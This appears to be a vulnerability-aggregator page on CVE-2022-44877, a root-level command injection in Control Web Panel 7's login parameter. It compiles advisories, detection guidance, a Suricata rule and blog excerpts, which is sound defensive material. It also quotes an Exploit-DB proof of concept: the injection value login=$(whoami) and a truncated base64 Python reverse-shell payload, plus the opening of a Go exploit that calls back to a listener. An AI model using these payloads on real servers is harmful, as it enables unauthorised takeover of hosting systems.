CVE-2022-44877
published 2023-01-05CVE-2022-44877: login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell…
PriorityP196critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2023-02-07
Exploited in the wild
EPSS
100.00%
100.0th percentile
login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| control-webpanel | webpanel | < 0.9.8.1147 | 0.9.8.1147 |
Detection & IOCsextracted from sources · hover to see the quote
- →Use the Nuclei template matcher: look for HTTP 302 responses with body containing 'Login Redirect.' in response to a crafted POST to /login/index.php with shell metacharacters in the login parameter. ↗
- →Fingerprint vulnerable CWP instances via Shodan or FOFA using the page title 'Login | Control WebPanel' before scanning for exploitation. ↗
- →Successful exploitation results in code execution as the root user; the HTTP request blocks while the command runs and results are not returned in the HTTP response — use out-of-band (DNS/interactsh) detection. ↗
- →The vulnerability is triggered when double quotes are used to log incorrect login entries to the system, allowing bash command injection — monitor CWP authentication logs for anomalous entries containing shell metacharacters. ↗
- ·Only CWP 7 versions before 0.9.8.1147 are vulnerable; instances already patched to 0.9.8.1147 or later are not affected. ↗
- ·According to Wiz data, CWP is not prevalent in cloud environments, so the risk of exploitation in cloud deployments is lower than in on-premises environments. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fxw7-8r5q-w2v4: RESERVED An issue in the /login/index
ghsa_unreviewed·2023-01-06
CVE-2022-44877 [CRITICAL] CWE-78 GHSA-fxw7-8r5q-w2v4: RESERVED An issue in the /login/index
RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.
VulnCheck
CWP Control Web Panel OS Command Injection Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-44877 [CRITICAL] CWE-78 CWP Control Web Panel OS Command Injection Vulnerability
CWP Control Web Panel OS Command Injection Vulnerability
CWP Control Web Panel (formerly CentOS Web Panel) contains an OS command injection vulnerability that allows remote attackers to execute commands via shell metacharacters in the login parameter.
Affected: CWP Control Web Panel
Required Action: Apply updates per vendor instructions.
Exploitation References: https://infosec.exchange/@shadowserver/109670024784488102; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://unit42.paloaltonetworks.com/network-security-trends-nov-jan/; https://information.rapid7.com/rs/411-NAK-970/images/Rapid7-2023-Mid-Year-Threat-Review.pdf; https://www.rapid7.com/globalassets/_pdfs/research/rapid7_2024_attack_intelligence_report.pdf; https://sysdig.com/blog/cryst
CISA
CWP Control Web Panel OS Command Injection Vulnerability
cisa·2023-01-17·CVSS 9.8
CVE-2022-44877 [CRITICAL] CWE-78 CWP Control Web Panel OS Command Injection Vulnerability
Vulnerability: CWP Control Web Panel OS Command Injection Vulnerability
Affected: CWP Control Web Panel
CWP Control Web Panel (formerly CentOS Web Panel) contains an OS command injection vulnerability that allows remote attackers to execute commands via shell metacharacters in the login parameter.
Required Action: Apply updates per vendor instructions.
Notes: https://control-webpanel.com/changelog#1669855527714-450fb335-6194; https://nvd.nist.gov/vuln/detail/CVE-2022-44877
Remediation Due Date: 2023-02-07
Suricata
ET EXPLOIT CentOS Control Web Panel Pre-Auth Remote Code Execution (CVE-2022-44877)
suricata·2023-01-13·CVSS 9.8
CVE-2022-44877 [CRITICAL] ET EXPLOIT CentOS Control Web Panel Pre-Auth Remote Code Execution (CVE-2022-44877)
ET EXPLOIT CentOS Control Web Panel Pre-Auth Remote Code Execution (CVE-2022-44877)
Rule: alert http any any -> $HOME_NET 2031 (msg:"ET EXPLOIT CentOS Control Web Panel Pre-Auth Remote Code Execution (CVE-2022-44877)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/login/index.php?login|3d 24|"; startswith; fast_pattern; http.cookie; content:"cwpsrv-"; http.request_body; content:"username="; startswith; content:"&password="; distance:0; content:"&commit=Login"; distance:0; endswith; reference:url,github.com/numanturle/CVE-2022-44877; reference:cve,2022-44877; classtype:attempted-admin; sid:2043302; rev:1; metadata:attack_target Server, created_at 2023_01_13, cve CVE_2022_44877, deployment Perimeter, deployment Datacenter, deployment SSLDecrypt, performance_im
Exploit-DB
Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
exploitdb·2023-04-05·CVSS 9.8
CVE-2022-44877 [CRITICAL] Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
---
// Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
// Date: 2023-02-02
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://centos-webpanel.com/
// Affected Versions: version < 0.9.8.1147
// Tested on: Kali Linux
// CVE : CVE-2022-44877
// Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7
// Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020
package main
import (
"bytes"
"crypto/tls"
"fmt"
"net/http"
"flag"
"time"
)
func main() {
var host,call string
flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)")
flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)")
flag.Parse()
b
Exploit-DB
Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
exploitdb·2023-04-01·CVSS 9.8
CVE-2022-44877 [CRITICAL] Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
---
[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Author: Numan Türle
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877
Description
Bash commands can be run because double quotes are used to log incorrect entries to the system.
Video Proof of Concept
https://www.youtube.com/watch?v=kiLfSvc1SYY
Proof of concept:
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KH
Metasploit
CWP login.php Unauthenticated RCE
metasploit
CWP login.php Unauthenticated RCE
CWP login.php Unauthenticated RCE
Control Web Panel versions < 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.
Nuclei
CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2022-44877 [CRITICAL] CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution
CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution
CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: CVE-2022-44877
info:
name: CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution
author: For3stCo1d
severity: critical
description: |
CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary sys
Unit42
Network Security Trends: November 2022-January 2023
blogs_unit42·2023-05-02·CVSS 9.8
CVE-2021-22005 [CRITICAL] Network Security Trends: November 2022-January 2023
Threat Research Center
Trend Reports
Vulnerabilities
## Network Security Trends: November 2022-January 2023
Yiheng An
Published: May 2, 2023
Trend Reports
Vulnerabilities
Attack analysis
CVE-2021-22005
CVE-2021-31602
CVE-2021-33035
CVE-2021-43287
CVE-2022-1118
CVE-2022-27924
CVE-2022-30136
CVE-2022-31137
CVE-2022-44877
CVE-2022-46169
Exploit in the wild
Network security trends
## Executive Summary
Recent observations of exploits used in the wild November 2022-January 2023 reveal that attackers have been using newly published remote code execution vulnerabilities in the following three products:
Roxy-WI, a web interface for managing and monitoring RoxyDNS
CWP, a free web hosting control panel (aka Control Web Panel or CentOS Web Panel)
Cacti, an open-source netw
Unit42
Network Security Trends: November 2022-January 2023
blogs_unit42·2023-05-02
Network Security Trends: November 2022-January 2023
## Executive Summary
Recent observations of exploits used in the wild November 2022-January 2023 reveal that attackers have been using newly published remote code execution vulnerabilities in the following three products:
- Roxy-WI, a web interface for managing and monitoring RoxyDNS
- CWP, a free web hosting control panel (aka Control Web Panel or CentOS Web Panel)
- Cacti, an open-source network monitoring and graphing tool used to track the performance of various network devices, servers and applications
Additionally, attackers have also been taking advantage of a traversal and information disclosure vulnerability in ThoughtWorks GoCD to read sensitive files stored on servers.
In our observations of network security trends, Unit 42 researchers have pinpointed several attacks based o
Wiz
#1 - CI/CD Supply Chain Attack | Wiz
blogs_wiz·2023-04-30·CVSS 9.8
CVE-2022-44877 [CRITICAL] #1 - CI/CD Supply Chain Attack | Wiz
Podcast
## #1 - CI/CD Supply Chain Attack
## Resources
just CircleCI incident report for January 4, 2023 security incident
CVE-2022-44877, critical RCE in CentOS Control Web Panel exploited in the wild
U.S. airline accidentally exposes ‘No Fly List’ on unsecured server
Hackers exploiting vulnerability affecting Zoho ManageEngine products: Rapid7
LastPass owner GoTo shares more bad news about November’s security breach
## More episodes
## Crying Out Cloud Newsletter
Stay Safe & Informed: Receive the Latest Cloud Security News, Real Attack Insights, and Expert Guidance to Protect Your Environment.
For information about how Wiz handles your personal data, please see our Privacy Policy .
## Platform
Wiz CNAPP
Wiz Code
Wiz Cloud
Wiz Defend
Integrations
Environments
Do
Sentinelone
CVE-2022-44877: CentOS Control Web Panel Unauthenticated RCE
blogs_sentinelone·2023-02-24·CVSS 9.8
CVE-2022-44877 [CRITICAL] CVE-2022-44877: CentOS Control Web Panel Unauthenticated RCE
CVE-2022-44877, an unauthenticated remote code execution flaw in Control Web Panel (CWP), formerly known as CentOS Web Panel. This vulnerability was first discovered by security researcher Numan Türle, who published a proof-of-concept exploit for it on January 3, 2023.
## About the CVE-2022-44877
The vulnerability arises from a condition allowing attackers to run bash commands when double quotes are used to log incorrect entries to the system. Successful exploitation allows remote attackers to execute arbitrary operating system commands via shell metacharacters in the login parameter (login/index.php).
This vulnerability was fixed in an October 2022 release of CWP. On January 6, 2023, security nonprofit Shadowserver reported exploitation in the wild. As of January 19, 2023, security fir
Sentinelone
CVE-2022-44877: CentOS Control Web Panel Unauthenticated RCE
blogs_sentinelone·2023-02-24·CVSS 9.8
CVE-2022-44877 [CRITICAL] CVE-2022-44877: CentOS Control Web Panel Unauthenticated RCE
CVE-2022-44877, an unauthenticated remote code execution flaw in Control Web Panel (CWP), formerly known as CentOS Web Panel. This vulnerability was first discovered by security researcher Numan Türle, who published a proof-of-concept exploit for it on January 3, 2023.
## About the CVE-2022-44877
The vulnerability arises from a condition allowing attackers to run bash commands when double quotes are used to log incorrect entries to the system. Successful exploitation allows remote attackers to execute arbitrary operating system commands via shell metacharacters in the login parameter (login/index.php).
This vulnerability was fixed in an October 2022 release of CWP. On January 6, 2023, security nonprofit Shadowserver reported exploitation in the wild. As of January 19, 2023, security fir
Sentinelone
CVE-2023-0669: Fortra GoAnywhere MFT RCE Vulnerability
blogs_sentinelone·2023-02-21·CVSS 7.2
CVE-2023-0669 [HIGH] CVE-2023-0669: Fortra GoAnywhere MFT RCE Vulnerability
In February 2023, Fortra notified users about a zero-day remote code vulnerability in the GoAnywhere MFT. The vendor provided an immediate response with mitigations and indicators of compromise . However, a week later, they released a patch.
It is claimed that over 1,000 instances of GoAnywhere are accessible through the internet. However, in order to exploit them, one needs to have access to the admin console of the application.
## About the CVE-2023-0669 vulnerability
CVE-2023-0669 is related to a pre-authentication command injection in GoAnywhere MFT, affecting version 7.1.1 and its earlier versions. If the vulnerability is successfully exploited, attackers can remotely execute code on vulnerable instances of GoAnywhere MFT.
The vulnerability has been marked as High . The CVSS score
Wiz
CVE-2022-44877, critical RCE in CentOS Control Web Panel exploited in the wild: everything you need to know | Wiz Blog
blogs_wiz·2023-01-17·CVSS 9.8
CVE-2022-44877 [CRITICAL] CVE-2022-44877, critical RCE in CentOS Control Web Panel exploited in the wild: everything you need to know | Wiz Blog
CVE-2022-44877, a critical RCE vulnerability in Control Web Panel 7 (also known as CentOS Web Panel), has been reportedly exploited in the wild. The vulnerability could allow an unauthenticated attacker to escalate privileges and execute code remotely on susceptible servers. Although the vulnerability was published and assigned a CVE on January 6, a fix has been available since October 25, 2022. It was assigned a CVSS score of 9.8.
Exploitation attempts reportedly began around January 6, closely following the publication of a public proof of concept .
## What is CVE-2022-44877?
root
## Wiz Research data: what is the risk to cloud environments?
According to Wiz data, CWP is not prevalent in cloud environments and therefore there is a lower risk of CVE-2022-44877 exploitation in such en
Wiz
CVE-2022-44877, critical RCE in CentOS Control Web Panel exploited in the wild: everything you need to know | Wiz Blog
blogs_wiz·2023-01-17·CVSS 9.8
CVE-2022-44877 [CRITICAL] CVE-2022-44877, critical RCE in CentOS Control Web Panel exploited in the wild: everything you need to know | Wiz Blog
CVE-2022-44877, a critical RCE vulnerability in Control Web Panel 7 (also known as CentOS Web Panel), has been reportedly exploited in the wild. The vulnerability could allow an unauthenticated attacker to escalate privileges and execute code remotely on susceptible servers. Although the vulnerability was published and assigned a CVE on January 6, a fix has been available since October 25, 2022. It was assigned a CVSS score of 9.8.
Exploitation attempts reportedly began around January 6, closely following the publication of a public proof of concept.
## What is CVE-2022-44877?
In unpatched versions of CWP, there is a flaw that allows the execution of Bash commands if double quotation marks are used when logging incorrect entries into the system. This flaw could enable an attacker to exe
http://packetstormsecurity.com/files/170388/Control-Web-Panel-7-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/170820/Control-Web-Panel-Unauthenticated-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/171725/Control-Web-Panel-7-CWP7-0.9.8.1147-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2023/Jan/1https://gist.github.com/numanturle/c1e82c47f4cba24cff214e904c227386https://www.youtube.com/watch?v=kiLfSvc1SYYhttp://packetstormsecurity.com/files/170388/Control-Web-Panel-7-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/170820/Control-Web-Panel-Unauthenticated-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/171725/Control-Web-Panel-7-CWP7-0.9.8.1147-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2023/Jan/1https://gist.github.com/numanturle/c1e82c47f4cba24cff214e904c227386https://www.youtube.com/watch?v=kiLfSvc1SYYhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-44877
2023-01-05
Published
2023-01-17
Added to CISA KEV
Exploited in the wild